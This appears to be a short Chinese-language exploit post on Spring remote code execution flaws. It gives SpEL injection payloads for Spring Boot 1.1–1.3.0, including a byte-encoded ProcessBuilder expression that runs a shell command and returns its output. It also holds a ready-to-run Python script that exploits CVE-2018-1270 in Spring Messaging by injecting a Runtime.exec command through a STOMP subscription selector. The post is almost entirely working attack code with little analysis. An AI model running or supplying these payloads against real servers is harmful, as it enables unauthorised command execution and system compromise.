漏洞:http://www.wooyun.org/bugs/wooyun-2016-0226888
影响版本:Spring Boot 1.1 1.2 1.3.0
“`
用法:
替换参数为:
Spring SPEL表达式POC
${new%20java.lang.String(new%20byte[]{70, 66, 66, 50, 48, 52, 65, 52, 48, 54, 49, 70, 70, 66, 68, 52, 49, 50, 56, 52, 65, 56, 52, 67, 50, 53, 56, 67, 49, 66, 70, 66})}
结果:
FBB204A4061FFBD41284A84C258C1BFB
返回结果是md5(wooyun)
Spring SPEL表达式EXP
${@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ipconfig’).getInputStream())}
直接执行命令,返回结果!!
上面的任意代码执行的EXP有的时候读不到回显,下面提供一个相对比较复杂的
${new java.io.BufferedReader( new java.io.InputStreamReader(new java.lang.ProcessBuilder(new String[]{new java.lang.String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}),new java.lang.String(new byte[]{45,99}),new java.lang.String(new byte[]{108, 115, 32, 45, 97, 108, 32, 124, 32, 116, 114, 32, 39, 10, 39, 32, 39, 32, 39})}).start().getInputStream())).readLine()}.
执行了ls命令,并把结果放到一行用空格隔开返回.注意最后有个 .
“`
## EXP
spring_message_rce.py
“`
# -*- coding:utf-8 -*-
# Author: CF_HB
# DATA: 2019-04-27
# successful Tested on OSX (10.14.2)
# REFERER:
# https://github.com/vulhub/vulhub/tree/master/spring/CVE-2018-1270
# https://github.com/CaledoniaProject/CVE-2018-1270
# usage:
# python3.6 spring_message_rce.py “/Applications/Calculator.app/Contents/MacOS/Calculator”
import logging
import websocket
import sys
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
ws = websocket.WebSocket()
# ws.connect(“ws://192.168.2.128:8080/hello”, http_proxy_host=”127.0.0.1″, http_proxy_port=8000)
ws.connect(“ws://192.168.2.128:8080/hello”)
logging.info(“Sending ‘Hello, World’…”)
txt1 = ”’CONNECT
accept-version:1.1,1.0
heart-beat:10000,10000\n\n\x00”’
ws.send(txt1)
logging.info(“Sent txt1”)
logging.info(“Receiving…”)
result = ws.recv()
logging.info(“Received ‘%s'” % result)
txt2 = ”’SUBSCRIBE
selector:T(java.lang.Runtime).getRuntime().exec(‘%s’)
id:sub-0
destination:/topic/greetings\n\n\x00”’ % (sys.argv[1])
ws.send(txt2)
logging.info(“Sent txt2”)
logging.info(“Receiving…”)
ws.close()
logging.info(“Exploit successful…..”)
“`
请登录后查看评论内容